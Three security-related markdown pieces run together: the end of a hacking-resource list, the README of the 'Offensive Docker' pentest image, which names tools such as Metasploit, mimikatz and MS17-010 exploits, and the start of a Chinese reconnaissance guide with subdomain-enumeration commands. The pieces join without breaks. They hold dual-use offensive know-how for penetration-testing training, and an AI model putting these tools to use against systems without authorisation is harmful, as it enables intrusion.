[HackerSploit](https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q) - [The Cyber Mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw) - [DefCon](https://www.youtube.com/user/DEFCONConference) - [NullByte](https://www.youtube.com/channel/UCgTNupxATBfWmfehv21ym-g) - [/dev/null](https://www.youtube.com/channel/UCGISJ8ZHkmIv1CaoHovK-Xw/videos) - [DeviantOllam(Lock Picking)](https://www.youtube.com/user/DeviantOllam/videos) - [Devon Crawford](https://www.youtube.com/channel/UCDrekHmOnkptxq3gUU0IyfA/videos) - [Programming with Mosh](https://www.youtube.com/channel/UCWv7vMbMWH4-V0ZXdmDpPBA) - [Kalle Hallden](https://www.youtube.com/channel/UCWr0mx597DnSGLFk1WfvSkQ) - [Alex Lee](https://www.youtube.com/channel/UC_fFL5jgoCOrwAVoM_fBYwA) - [javidx9](https://www.youtube.com/channel/UC-yuWVUplUJZvieEligKBkA) - [Hak5](https://www.youtube.com/channel/UC3s0BtrBJpwNDaflRSoiieQ) - [The Shadow Brokers](https://www.youtube.com/channel/UCkpwPf2B4FphjqVcozDym0A) ### Books/Publishers - [No Starch Press](https://nostarch.com/catalog/) - Technical books on hardware, programming, hacking, firewalls, and much more. - [Packt Publishing](https://www.packtpub.com/free-learning) - Technical books. Packt also releases a free ebook every single day! ### Bug Bountys - [BugCrowd](https://www.bugcrowd.com/) - A site with a collection of bug bounty programs. This site also contains a feed of disclosed vulnerabilities for these programs, which can be helpful for learning. - [HackerOne](https://www.hackerone.com/) - A site with a collection of bug bounty programs. This site also contains a feed of disclosed vulnerabilities for these programs, which can be helpful for learning. ### \#\#TODO - Things to add - Ansible - Terraform - More blue team stuff - Sorting System for the YouTube channels(Problem is some channels do more than one topic) - Descriptions? Tags? Etc. - Anything else I haven't thought of
<!-- markdownlint-disable MD033 MD041 --> <p align="center"> <a href="https://hub.docker.com/r/aaaguirrep/offensive-docker"> <img alt="Offensive Docker" src="https://github.com/aaaguirrep/offensive-docker/blob/master/img/banner.jpg" width="600" /> </a> </p> <br/> <p align="center"> <a href="https://github.com/aaaguirrep/offensive-docker"><img alt="GitHub code size in bytes" src="https://img.shields.io/github/languages/code-size/aaaguirrep/offensive-docker"></a> <a href="https://github.com/aaaguirrep/offensive-docker"><img alt="GitHub repo size" src="https://img.shields.io/github/repo-size/aaaguirrep/offensive-docker"></a> <a href="https://github.com/aaaguirrep/offensive-docker"><img alt="GitHub last commit" src="https://img.shields.io/github/last-commit/aaaguirrep/offensive-docker"></a> <a href="https://github.com/aaaguirrep/offensive-docker"><img alt="GitHub issues" src="https://img.shields.io/github/issues/aaaguirrep/offensive-docker"></a> <a href="https://github.com/aaaguirrep/offensive-docker/graphs/contributors"><img alt="GitHub contributors" src="https://img.shields.io/github/contributors/aaaguirrep/offensive-docker"> <a href="https://github.com/aaaguirrep/offensive-docker/blob/master/LICENSE"><img alt="GitHub" src="https://img.shields.io/github/license/aaaguirrep/offensive-docker"></a> </p> <p align="center"> <a href="https://hub.docker.com/r/aaaguirrep/offensive-docker"><img alt="Docker Cloud Build Status" src="https://img.shields.io/docker/cloud/build/aaaguirrep/offensive-docker"></a> <a href="https://hub.docker.com/r/aaaguirrep/offensive-docker"><img alt="Docker Automated build" src="https://img.shields.io/docker/automated/aaaguirrep/offensive-docker"></a> <a href="https://hub.docker.com/r/aaaguirrep/offensive-docker"><img alt="Docker Pulls" src="https://img.shields.io/docker/pulls/aaaguirrep/offensive-docker"></a> <a href="https://hub.docker.com/r/aaaguirrep/offensive-docker"><img alt="Docker Image Size (latest by date)" src="https://img.shields.io/docker/image-size/aaaguirrep/offensive-docker"></a> <a href="https://hub.docker.com/r/aaaguirrep/offensive-docker"><img alt="Docker Image Version (latest by date)" src="https://img.shields.io/docker/v/aaaguirrep/offensive-docker"></a> <a href="https://hub.docker.com/r/aaaguirrep/offensive-docker"><img alt="Docker Stars" src="https://img.shields.io/docker/stars/aaaguirrep/offensive-docker"></a> </p> <p align="center"> <a href="https://discord.gg/2uBfu8E"><img alt="Discord" src="https://img.shields.io/discord/749093790676942888"></a> </p> Offensive Docker is an image with the more used tools to create an pentest environment easily and quickly. :arrow_right: **Note:** Check out the next repo to know how to launch offensive docker in a VPS in Google Cloud Platform or Digital Ocean (free credit included). [Offensive Docker VPS](https://github.com/aaaguirrep/offensive-docker-vps) ### Table of Contents - [Links](#links) - [Features](#features) - [Requirements](#requirements) - [Tools installed](#tools-installed) - [Operative system tools](#operative-system-tools) - [Network tools](#network-tools) - [Developer tools](#developer-tools) - [:hocho: Offensive tools](#hocho-offensive-tools) - [Port scanning](#port-scanning) - [:mag: Recon](#mag-recon) - [Subdomains](#subdomains) - [Subdomain takeover](#subdomain-takeover) - [DNS Lookups](#dns-lookups) - [:camera: Screenshot](#camera-screenshot) - [:spider_web: Crawler](#spider_web-crawler) - [:file_folder: Search directories](#file_folder-search-directories) - [Fuzzer](#fuzzer) - [Web Scanning](#web-scanning) - [CMS](#cms) - [Search JS](#search-js) - [Wordlist](#wordlist) - [Git repositories](#git-repositories) - [OWASP](#owasp) - [:iphone: Mobile](#iphone-mobile) - [Brute force](#brute-force) - [Cracking](#cracking) - [OS Enumeration](#os-enumeration) - [Exploits](#exploits) - [Windows](#windows) - [Reverse shell](#reverse-shell) - [Other resources](#other-resources) - [Forensic](#forensic) - [Custom functions](#custom-functions) - [Other services](#other-services) - [Reporting tools](#reporting-tools) - [:memo: Documentation](#memo-documentation) - [:hammer_and_wrench: Usage](#hammer_and_wrench-usage) - [Option 1 - Use the github repository](#option-1---use-the-github-repository) - [Option 2 - Use the image from docker hub](#option-2---use-the-image-from-docker-hub) - [Considerations to run the container](#considerations-to-run-the-container) - [:gear: Nice configurations](#gear-nice-configurations) - [1. Configure credentials in the docker](#1-configure-credentials-in-the-docker) - [2. Alias to connect to HTB (Hack the Box) VPN](#2-alias-to-connect-to-htb-hack-the-box-vpn) - [Option 1 - HTB VPN using github repository](#option-1---htb-vpn-using-github-repository) - [Option 2 - HTB VPN using docker hub image](#option-2---htb-vpn-using-docker-hub-image) - [3. Save and load command history in your local environment](#3-save-and-load-command-history-in-your-local-environment) - [Option 1 - Command history using github repository](#option-1---command-history-using-github-repository) - [Option 2 - Command history using docker hub image](#option-2---command-history-using-docker-hub-image) - [:white_check_mark: Environment tested](#white_check_mark-environment-tested) - [:warning: Warning](#warning-warning) - [:coffee: Donations](#coffee-donations) - [Contributors](#contributors) - [Contributing](#contributing) - [:chart_with_upwards_trend: Stargazers over time](#chart_with_upwards_trend-stargazers-over-time) - [License](#license) ## Links - 🎬 Video: [Demos](https://asciinema.org/~aaaguirrep) - 💬 Chat: [Discord](https://discord.gg/2uBfu8E) - 🌟 [VPS Automation](https://github.com/aaaguirrep/offensive-docker-vps) - 👉 [Advanced configurations](https://github.com/aaaguirrep/offensive-docker-custom) ## Features - OS, networking, developing and pentesting tools installed. - Connection to HTB (Hack the Box) vpn to access HTB machines. - Popular wordlists installed: SecLists, dirb, dirbuster, fuzzdb, wfuzz and rockyou. - Proxy service to send traffic from any browsers and burp suite installed in your local directory. - Exploit database installed. - Tool for cracking password. - Linux enumeration tools installed. - Tools installed to discovery services running. - Tools installed to directory fuzzing. - Monitor for linux processes without root permissions - Zsh shell installed. ## Requirements - Docker service installed ## Tools installed ### Operative system tools - rdate - vim - zsh - oh-my-zsh - locate - cifs-utils - htop - tree - [gotop](https://github.com/cjbassi/gotop) - fcrackzip ### Network tools - traceroute - telnet - net-tools - iputils-ping - tcpdump - openvpn - whois - host - prips - dig ### Developer tools - git - curl - wget - ruby - go - python - python-pip - python3 - python3-pip - php - aws-cli - [tojson](https://github.com/tomnomnom/hacks/tree/master/tojson) - nodejs ### :hocho: Offensive tools #### Port scanning - [nmap](https://github.com/nmap/nmap) - [masscan](https://github.com/robertdavidgraham/masscan) - [naabu](https://github.com/projectdiscovery/naabu) #### :mag: Recon ##### Subdomains - [Amass](https://github.com/OWASP/Amass) - [GoBuster](https://github.com/OJ/gobuster) - [Knock](https://github.com/guelfoweb/knock) - [MassDNS](https://github.com/blechschmidt/massdns) - [Altdns](https://github.com/infosec-au/altdns) - [spyse](https://github.com/zeropwn/spyse.py) - [Sublist3r](https://github.com/aboul3la/Sublist3r) - [findomain](https://github.com/Edu4rdSHL/findomain) - [subfinder](https://github.com/projectdiscovery/subfinder) - [spiderfoot](https://github.com/smicallef/spiderfoot) - [haktldextract](https://github.com/hakluke/haktldextract) ##### Subdomain takeover - [subjack](https://github.com/haccer/subjack) - [SubOver](https://github.com/Ice3man543/SubOver) - [tko-subs](https://github.com/anshumanbh/tko-subs) ##### DNS Lookups - [hakrevdns](https://github.com/hakluke/hakrevdns) ##### :camera: Screenshot - [gowitness](https://github.com/sensepost/gowitness) - [aquatone](https://github.com/michenriksen/aquatone) ##### :spider_web: Crawler - [hakrawler](https://github.com/hakluke/hakrawler) - [Photon](https://github.com/s0md3v/Photon) - [gospider](https://github.com/jaeles-project/gospider) - [gau](https://github.com/lc/gau) - [otxurls](https://github.com/lc/otxurls) - [waybackurls](https://github.com/tomnomnom/waybackurls) ##### :file_folder: Search directories - [dirsearch](https://github.com/maurosoria/dirsearch) ##### Fuzzer - [wfuzz](https://github.com/xmendez/wfuzz) - [ffuf](https://github.com/ffuf/ffuf) ##### Web Scanning - [whatweb](https://github.com/urbanadventurer/WhatWeb) - [wafw00z](https://github.com/EnableSecurity/wafw00f) - [nikto](https://github.com/sullo/nikto) - [arjun](https://github.com/s0md3v/Arjun) - [httprobe](https://github.com/tomnomnom/httprobe) - [striker](https://github.com/s0md3v/Striker) - [hakcheckurl](https://github.com/hakluke/hakcheckurl) - [httpx](https://github.com/projectdiscovery/httpx) ##### CMS - [wpscan](https://github.com/wpscanteam/wpscan) - [joomscan](https://github.com/rezasp/joomscan) - [droopescan](https://github.com/droope/droopescan) - [cmseek](https://github.com/Tuhinshubhra/CMSeeK) ##### Search JS - [LinkFinder](https://github.com/GerbenJavado/LinkFinder) - [getJS](https://github.com/003random/getJS) - [subjs](https://github.com/lc/subjs) #### Wordlist - [cewl](https://github.com/digininja/CeWL) - wordlists: - [wfuzz](https://github.com/xmendez/wfuzz) - [SecList](https://github.com/danielmiessler/SecLists) - [Fuzzdb](https://github.com/fuzzdb-project/fuzzdb) - [Dirbuster](https://github.com/daviddias/node-dirbuster) - [Dirb](https://github.com/v0re/dirb) - [Rockyou](https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt) - [all.txt](https://gist.github.com/jhaddix/f64c97d0863a78454e44c2f7119c2a6a) - crunch #### Git repositories - [gitleaks](https://github.com/zricethezav/gitleaks) - [gitrob](https://github.com/michenriksen/gitrob) - [gitGraber](https://github.com/hisxo/gitGraber) - [github-search](https://github.com/gwen001/github-search) - [GitTools](https://github.com/internetwache/GitTools) #### OWASP - [sqlmap](https://github.com/sqlmapproject/sqlmap) - [XSStrike](https://github.com/s0md3v/XSStrike) - [kxss](https://github.com/tomnomnom/hacks/tree/master/kxss) - [dalfox](https://github.com/hahwul/dalfox) - [jwt_tool](https://github.com/ticarpi/jwt_tool) - [jaeles](https://github.com/jaeles-project/jaeles) #### :iphone: Mobile - [apktool](https://ibotpeaches.github.io/Apktool/) #### Brute force - [crowbar](https://github.com/galkan/crowbar) - [hydra](https://github.com/vanhauser-thc/thc-hydra) - [patator](https://github.com/lanjelot/patator) - medusa #### Cracking - [hashid](https://github.com/psypanda/hashID) - [john the ripper](https://github.com/magnumripper/JohnTheRipper) - [hashcat](https://github.com/hashcat/hashcat) #### OS Enumeration - [htbenum](https://github.com/SolomonSklash/htbenum) - [linux-smart-enumeration](https://github.com/diego-treitos/linux-smart-enumeration) - [linenum](https://github.com/rebootuser/LinEnum) - [enum4linux](https://github.com/portcullislabs/enum4linux) - [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) - [PEASS - Privilege Escalation Awesome Scripts SUITE](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) - [Windows Exploit Suggester - Next Generation](https://github.com/bitsadmin/wesng) - [smbmap](https://github.com/ShawnDEvans/smbmap) - [pspy - unprivileged Linux process snooping](https://github.com/DominicBreuker/pspy) - smbclient - ftp #### Exploits - [searchsploit](https://github.com/offensive-security/exploitdb) - [Metasploit](https://github.com/rapid7/metasploit-framework) - [MS17-010](https://github.com/worawit/MS17-010) - [AutoBlue-MS17-010](https://github.com/3ndG4me/AutoBlue-MS17-010) - [PrivExchange](https://github.com/dirkjanm/PrivExchange) #### Windows - [evil-winrm](https://github.com/Hackplayers/evil-winrm) - [impacket](https://github.com/SecureAuthCorp/impacket) - [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) - [Nishang](https://github.com/samratashok/nishang) - [Juicy Potato](https://github.com/ohpe/juicy-potato) - [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) - [pass-the-hash](https://github.com/byt3bl33d3r/pth-toolkit) - [mimikatz](https://github.com/gentilkiwi/mimikatz) - gpp-decrypt - Netcat executables - Plink executables #### Reverse shell - [netcat](https://github.com/diegocr/netcat) - [rlwrap](https://github.com/hanslub42/rlwrap) #### Other resources - [pentest-tools](https://github.com/gwen001/offensive-tools) from [@gwen001](https://github.com/gwen001) - [qsreplace](https://github.com/tomnomnom/qsreplace) from [@tomnomnom](https://github.com/tomnomnom) ### Forensic - [exiftool](https://github.com/exiftool/exiftool) - [steghide](https://github.com/StefanoDeVuono/steghide) - [binwalk](https://github.com/ReFirmLabs/binwalk) - [foremost](https://github.com/DogFive/foremost) ### Custom functions - NmapExtractPorts from [@s4vitar](https://github.com/s4vitar) ### Other services - apache2 - squid - ssh - rsyslog ### Reporting tools - Latex ## :memo: Documentation See the project's [wiki](https://github.com/aaaguirrep/offensive-docker/wiki) for documentation. ## :hammer_and_wrench: Usage You can use the docker image by the next two options: ### Option 1 - Use the github repository git clone --depth 1 https://github.com/aaaguirrep/offensive-docker.git cd offensive-docker docker build -t offensive-docker . docker run --rm -it --name my-offensive-docker offensive-docker /bin/zsh ### Option 2 - Use the image from docker hub Use image from docker hub: [aaaguirrep/offensive-docker](https://hub.docker.com/r/aaaguirrep/offensive-docker) docker pull aaaguirrep/offensive-docker docker run --rm -it --name my-offensive-docker aaaguirrep/offensive-docker /bin/zsh ### Considerations to run the container There are differents use cases for use the image and you should know how to run the container properly. 1. Use the container to access HTB (Hack the Box) machines by HTB vpn. docker run --rm -it --cap-add=NET_ADMIN --device=/dev/net/tun --sysctl net.ipv6.conf.all.disable_ipv6=0 --name my-offensive-docker aaaguirrep/offensive-docker /bin/zsh 2. Share information from your local directory to container directory and save information on your local directory. You should save information under /offensive directory. docker run --rm -it -v /path/to/local/directory:/offensive --name my-offensive-docker aaaguirrep/offensive-docker /bin/zsh 3. Expose internal container services (apache, squid) for your local environment. docker run --rm -it --name my-offensive-docker -p 80:80 -p 3128:3128 aaaguirrep/offensive-docker /bin/zsh Inside the container start apache2 and squid services by the aliases. apacheUp squidUp 4. Mount directories by umount command. docker run --rm -it --privileged --name my-offensive-docker aaaguirrep/offensive-docker /bin/zsh 5. Tools are downloaded in /tools directory. ## :gear: Nice configurations You can set up the docker image with nice configurations like as: ### 1. Configure credentials in the docker To use access keys, tokens or API Keys in the docker review the next repo [Offensive Docker Custom](https://github.com/aaaguirrep/offensive-docker-custom) ### 2. Alias to connect to HTB (Hack the Box) VPN To use both options you should use -v option to map local directoty with /offensive container directory. #### Option 1 - HTB VPN using github repository Add the next line in step "Create shorcuts" in Dockerfile, build a new image and run a new container with the -v option. RUN echo "alias vpnhtb=\"openvpn /offensive/path/to/ovpn/file\"" >> /root/.zshrc #### Option 2 - HTB VPN using docker hub image Create a new Dockerfile with the next steps, build a new image and run a new container with -v option. FROM aaaguirrep/offensive-docker # Create a shortcut and load the ovpn file from workstation RUN echo "alias vpnhtb=\"openvpn /offensive/path/to/ovpn/file\"" >> /root/.zshrc ### 3. Save and load command history in your local environment When you delete a container all information is deleted incluide command history. The next configuration provides you an option for save the command history in your local environment and load it when you run a new container. So, you wont lose your command history when run a new container. To use both options you should use -v option to map local directoty with /offensive container directory. #### Option 1 - Command history using github repository Add the next line in step "Create shorcuts" in Dockerfile, build a new image and run a new container. # Save and load command history in your local environment RUN sed -i '1i export HISTFILE="/history/.zsh_history"' /root/.zshrc #### Option 2 - Command history using docker hub image Create a new Dockerfile with the next steps, build a new image and run a new container. FROM aaaguirrep/offensive-docker # Save and load command history in your local environment RUN sed -i '1i export HISTFILE="/history/.zsh_history"' /root/.zshrc ## :white_check_mark: Environment tested The image was tested in the following environments: - Docker service for Mac ```Docker version 19.03.13, build 4484c46d9d``` - Docker service for Linux instance on Google Cloud Platform ```Docker version 19.03.6, build 369ce74a3c``` - Docker service for Linux droplet on Digital Ocean ```Docker version 19.03.6, build 369ce74a3c``` ## :warning: Warning - Do not save information on container directories because it will be lost after delete the container, you should save information in your local environment using the parameter -v when you run the container. For instance: docker run --rm -it -v /path/to/local/directory:/offensive --name my-offensive-docker aaaguirrep/offensive-docker /bin/zsh The above command specify a path local directory mapped with /offensive container directory. You should save all information under /offensive directory. - Use hashcat and john the ripper on controlled environments as CTF. You can experiment issues. ## :coffee: Donations Thanks for your donations, are always appreciated. While I drink the coffee I check more tools to add in the docker image. [![Buy me a coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://www.buymeacoffee.com/aaaguirrep) ## Contributors Thank you to all our [contributors](https://github.com/aaaguirrep/offensive-docker/graphs/contributors)! ## Contributing [Contributing Guide](CONTRIBUTING.md) ## :chart_with_upwards_trend: Stargazers over time [![Stargazers over time](https://starchart.cc/aaaguirrep/offensive-docker.svg)](https://starchart.cc/aaaguirrep/offensive-docker) ## License [MIT](LICENSE) Copyright (c) 2020, Arsenio Aguirre
# Information Collection For Pentest ## 声明 ``` Author: Qftm Date: 2020/01/18 ``` ## 正文 "只有不努力的黑客,没有攻不破的系统"。 在SRC漏洞挖掘或渗透测试中,信息收集占很大一部分,能收集到别人收集不到的资产,就能挖到别人挖不到的洞。 Table of Contents ================= - [收集域名信息](#收集域名信息) - [Whois 查询](#whois-查询) - [备案信息查询](#备案信息查询) - [信用信息查询](#信用信息查询) - [IP反查站点的站](#ip反查站点的站) - [在线网站](#在线网站) - [Dnslytics](#dnslytics) - [浏览器插件](#浏览器插件) - [myip.ms](#myip.ms) - [TCPIPUTILS](#tcpiputils) - [DNSlytics](#dnslytics-1) - [收集相关应用信息](#收集相关应用信息) - [微信公众号&微博](#微信公众号微博) - [天眼查](#天眼查) - [APP](#app) - [七麦数据](#七麦数据) - [AppStore](#appstore) - [收集子域名信息](#收集子域名信息) - [在线平台](#在线平台) - [第三方平台查询](#第三方平台查询) - [权重综合查询](#权重综合查询) - [全国政府网站基本数据库](#全国政府网站基本数据库) - [IP反查绑定域名网站](#ip反查绑定域名网站) - [资产搜索引擎](#资产搜索引擎) - [Google语法查询](#google语法查询) - [FOFA语法查询](#fofa语法查询) - [工具枚举](#工具枚举) - [OneForAll](#oneforall) - [Layer](#layer) - [subDomainsBrute](#subdomainsbrute) - [Sublist3r](#sublist3r) - [证书透明度公开日志枚举](#证书透明度公开日志枚举) - [在线第三方平台查询](#在线第三方平台查询) - [工具枚举查询](#工具枚举查询) - [Findomain](#findomain) - [DNS历史解析](#dns历史解析) - [DNS域传送漏洞](#dns域传送漏洞) - [DNS记录分类](#dns记录分类) - [DNS注册信息](#dns注册信息) - [DNS域传送漏洞原理](#dns域传送漏洞原理) - [DNS域传送漏洞检测](#dns域传送漏洞检测) - [nslookup](#nslookup) - [nmap](#nmap) - [dig](#dig) - [查找真实IP](#查找真实ip) - [CDN简介](#cdn简介) - [国内外CND](#国内外cnd) - [判断目标是否存在CDN](#判断目标是否存在cdn) - [Ping目标主域](#ping目标主域) - [Nslookup](#nslookup-1) - [不同DNS域名解析](#不同dns域名解析) - [nslookup默认解析](#nslookup默认解析) - [全国Ping](#全国ping) - [站长工具](#站长工具) - [17CE](#ce) - [IPIP](#ipip) - [工具查询](#工具查询) - [Cdnplanet](#cdnplanet) - [绕过CDN查找真实IP](#绕过cdn查找真实ip) - [内部邮箱源](#内部邮箱源) - [国外请求](#国外请求) - [国际Ping](#国际ping) - [国外DNS解析](#国外dns解析) - [分站域名&C段查询](#分站域名c段查询) - [分站域名](#分站域名) - [C段查询](#c段查询) - [网站漏洞](#网站漏洞) - [一些测试文件](#一些测试文件) - [SSRF漏洞](#ssrf漏洞) - [查询域名解析记录](#查询域名解析记录) - [目标网站APP应用](#目标网站app应用) - [网络空间引擎搜索](#网络空间引擎搜索) - [收集常用端口信息](#收集常用端口信息) - [常见端口&解析&总结](#常见端口解析总结) - [扫描工具](#扫描工具) - [常用扫描工具](#常用扫描工具) - [常用扫描工具使用](#常用扫描工具使用) - [nmap](#nmap-1) - [Masscan](#masscan) - [Zmap](#zmap) - [御剑高速TCP端口扫描工具](#御剑高速tcp端口扫描工具) - [御剑高速端口扫描工具](#御剑高速端口扫描工具) - [masnmapscan](#masnmapscan) - [网络空间引擎搜索](#网络空间引擎搜索-1) - [浏览器插件](#浏览器插件-1) - [Shodan](#shodan) - [TCPIPUTILS](#tcpiputils-1) - [DNSlytics](#dnslytics-2) - [指纹识别](#指纹识别) - [第三方平台](#第三方平台) - [工具](#工具) - [浏览器插件](#浏览器插件-2) - [Wappalyzer](#wappalyzer) - [收集敏感信息](#收集敏感信息) - [WAF识别](#waf识别) - [wafw00f](#wafw00f) - [源码泄露](#源码泄露) - [常见源码泄露](#常见源码泄露) - [源码泄露扫描工具](#源码泄露扫描工具) - [源码泄露利用工具](#源码泄露利用工具) - [备份文件泄露](#备份文件泄露) - [网站备份文件泄露常见名称](#网站备份文件泄露常见名称) - [网站备份文件泄露常见后缀](#网站备份文件泄露常见后缀) - [网站备份文件泄露扫描工具](#网站备份文件泄露扫描工具) - [Google Hacking](#google-hacking) - [常用GoogleHacking语法](#常用googlehacking语法) - [其他GoogleHacking语法](#其他googlehacking语法) - [GoogleHacking典型用法](#googlehacking典型用法) - [JS获取敏感接口](#js获取敏感接口) - [JSFinder](#jsfinder) - [LinkFinder](#linkfinder) - [目录&后台扫描](#目录后台扫描) - [越权查询](#越权查询) - [代码托管](#代码托管) - [Whois&备案查询](#whois备案查询) - [公网网盘](#公网网盘) - [凌风云搜索](#凌风云搜索) - [网站截图](#网站截图) - [webscreenshot](#webscreenshot) - [获取公开文件](#获取公开文件) - [snitch](#snitch) - [Google Hacking](#google-hacking-1) - [邮箱信息收集](#邮箱信息收集) - [Infoga](#infoga) - [Google Hacking](#google-hacking-2) - [历史漏洞&资产](#历史漏洞资产) 收集域名信息 ============ 知道目标域名之后,我们要做的第一件事情就是获取域名的注册信息,包括该域名的DNS服务器信息和注册人的联系信息等。 Whois 查询 ---------- Whois 简单来说,就是一个用来查询域名是否已经被注册,以及注册域名的详细信息的数据库(如域名所有人、域名注册商、域名注册日期和过期日期、DNS等)。通过域名Whois服务器查询,可以查询域名归属者联系方式,以及注册和到期时间。 Kali下whois查询 https://www.kali.org/downloads/ 域名Whois查询 - 站长之家 http://whois.chinaz.com/ Whois 爱站 http://whois.aizhan.com/ ip138 https://site.ip138.com/ Whois Lookup https://www.whois.net/ ICANN Lookup https://lookup.icann.org/ 域名信息查询 - 腾讯云https://whois.cloud.tencent.com/domain?domain= nicolasbouliane http://nicolasbouliane.com/utils/whois/?url=http://baidu.com 新网 whois信息查询 http://whois.xinnet.com/ IP WHOIS查询 - 站长工具 http://tool.chinaz.com/ipwhois/ ![image-20200114212425017](img/image-20200114212425017.png) 备案信息查询 ------------ 国内网站注册需要向国家有关部门申请备案,防止网站从事非法活动,而国外网站不需要备案2333。 ICP备案查询网 http://www.beianbeian.com/ ICP备案查询 - 站长工具 http://icp.chinaz.com/ SEO综合查询 - 爱站 https://www.aizhan.com/seo/ 批量查询 - 站长工具 http://icp.chinaz.com/searchs 工业和信息化部ICP/IP/域名信息备案管理 http://www.beian.miit.gov.cn/publish/query/indexFirst.action ![image-20200114212345269](img/image-20200114212345269.png) 信用信息查询 ------------ 国家企业信用信息公示系统 http://www.gsxt.gov.cn/index.html 全国企业信息查询 http://company.xizhi.com/ 个人信用查询搜索-企业信息查询搜索-统一社会信用代码查询-信用中国 https://www.creditchina.gov.cn/ ![image-20200114212035697](img/image-20200114212035697.png) IP反查站点的站 -------------- ### 在线网站 #### Dnslytics Dnslytics地址:https://dnslytics.com/ 利用Dnslytics反查IP可以得到如下信息 IP information Network information Hosting information SPAM database lookup Open TCP/UDP ports Blocklist lookup Whois information Geo information Country information Update information 利用Dnslytics反查域名可以得到如下信息 Domain and Ranking Information Hosting Information{ A / AAAA Record NS Record MX Record SPF Record } Web Information Whois Information 浏览器插件 ---------- 通过Google、FireFox等插件的使用,收集域名信息 ### myip.ms ![image-20200118161948549](img/image-20200118161948549.png) ### TCPIPUTILS ![image-20200118161937093](img/image-20200118161937093.png) ### DNSlytics ![image-20200118161924562](img/image-20200118161924562.png) 收集相关应用信息 ================ 天眼查 https://www.tianyancha.com/ 企查查 https://www.qichacha.com/ 微信公众号&微博 --------------- ### 天眼查 根据前面获取的企业名称可以获取目标企业的微信公众号、微博、备案站点、软件著作权等信息。 天眼查-商业安全工具 https://www.tianyancha.com/ ![image-20200114211342621](img/image-20200114211342621.png) 微信公众号 ![image-20200114211411218](img/image-20200114211411218.png) 微博 ![image-20200114211453631](img/image-20200114211453631.png) APP --- ### 七麦数据 https://www.qimai.cn/ 通过当前APP查询同开发商应用,得到目标所有APP应用 ![image-20200114214015768](img/image-20200114214015768.png) ### AppStore https://apps.apple.com/ 通过当前APP查询同开发商应用,得到目标所有APP应用 ![image-20200114220939536](img/image-20200114220939536.png) 收集子域名信息 ============== 子域名也就是二级域名,是指顶级域名下的域名。假设我们的目标网络规模比较大,直接从主域入手显然是很不理智的,因为对于这种规模的目标,一般其主域都是重点防护区域,所以不如先进入目标的某个子域,然后再想办法迂回接近真正的目标,这无疑是个比较好的选择。那么问题来了,怎样才能尽可能多地搜集目标的高价值子域呢?常用的方法有以下这几种。 在线平台 -------- ### 第三方平台查询 主要是一些第三方网站和一些博主提供的服务 ip138 https://site.ip138.com/ 站长工具 http://tool.chinaz.com/subdomain/?domain= hackertarget https://hackertarget.com/find-dns-host-records/ phpinfo https://phpinfo.me/domain/ t1h2ua https://www.t1h2ua.cn/tools/ dnsdumpster https://dnsdumpster.com/ chinacycc https://d.chinacycc.com/ zcjun http://z.zcjun.com/ ### 权重综合查询 爱站 https://www.aizhan.com/seo/ 站长工具 http://rank.chinaz.com/all/ ![image-20200112214609756](img/image-20200112214609756.png) ### 全国政府网站基本数据库 http://114.55.181.28/databaseInfo/index ![image-20200112204404548](img/image-20200112204404548.png) ### IP反查绑定域名网站 IP关联域名,大部分网站一个IP多个域名 http://s.tool.chinaz.com/same?s http://dns.aizhan.com/ 资产搜索引擎 ------------ google、shodan、FOFA、zoomeye ### Google语法查询 搜索子域名 "site:xxxxx" site:baidu.com ![image-20200112224943902](img/image-20200112224943902.png)z ### FOFA语法查询 https://fofa.so/ 搜索子域名 "domain:xxxxx" domain="baidu.com" ![image-20200112225256858](img/image-20200112225256858.png) 工具枚举 -------- 常用子域名工具如下(Github上都可搜到) OneForAll Layer Sublist3r subDomainsBrute K8 wydomain dnsmaper dnsbrute Findomain fierce等 个人推荐:`OneForAll`、`Layer`、`Sublist3r`、`subDomainsBrute` ### OneForAll OneForAll是一款功能强大的子域收集工具,拥有多个模块和接口扫描,收集子域信息很全,包括子域、子域IP、子域常用端口、子域Title、子域Banner、子域状态等。 项目地址:`https://github.com/shmilylty/OneForAll` 子域名收集:`python3 oneforall.py --target=target.com run` ![image-20200114172411366](img/image-20200114172411366.png) ### Layer Layer子域名挖掘机的使用方法比较简单,在域名对话框中直接输入域名就可以进行扫描,它的显示界面比较细致,有域名、解析IP、开放端口、Web服务器和网站状态等 ![image-20200114173959157](img/image-20200114173959157.png) ### subDomainsBrute subDomainsBrute的特点是可以用小字典递归地发现三级域名、四级域名,甚至五级域名等不容易被探测到的域名。 项目地址:`https://github.com/lijiejie/subDomainsBrute` 子域名收集:`python subDomainsbrute.py xtarget.com` ### Sublist3r Sublist3r也是一个比较常用的工具, 它能列举多种资源,如在Google、Yahoo、 Bing、 Baidu和Ask等搜索引擎中可查到的子域名,还可以列出Netcraft、VirusTotal、ThreatCrowd、 DNSdumpster、SSL Certificates、和Reverse DNS查到的子域名。 项目地址:`https://github.com/aboul3la/Sublist3r` 子域名收集:`python sublist3r.py -d target.com -b -t 50 -p 80,443,21,22` ![image-20200114180326611](img/image-20200114180326611.png) 证书透明度公开日志枚举 ---------------------- 证书透明度(Certificate Transparency, CT)是证书授权机构(CA) 的一个项目,证书授权机构会将每个SSL/TLS证书发布到公共日志中。一个SSL/TLS证书通常包含域名、子域名和邮件地址, 这些也经常成为攻击者非常希望获得的有用信息。查找某个域名所属证书的最简单的方法就是使用搜索引\|擎搜索一些公开的CT日志。 ### 在线第三方平台查询 crt.sh: https://crt.sh censys: https://censys.io myssl:https://myssl.com crt: https://crt.sh/?q=baidu.com ![image-20200113161438681](img/image-20200113161438681.png) ![image-20200113161510685](img/image-20200113161510685.png) censys: https://www.censys.io/certificates?q=baidu.com ![image-20200113161541640](img/image-20200113161541640.png) ### 工具枚举查询 通过工具可以调用各个证书接口进行域名查询 常用工具 Findomain Sublist3r(SSL Certificates)等 #### Findomain Findomain不使用子域名寻找的常规方法,而是使用证书透明度日志来查找子域,并且该方法使其工具更加快速和可靠。该工具使用多个公共API来执行搜索: Certspotter Crt.sh Virustotal Sublist3r Facebook ** Spyse (CertDB) * Bufferover Threadcrow Virustotal with apikey ** 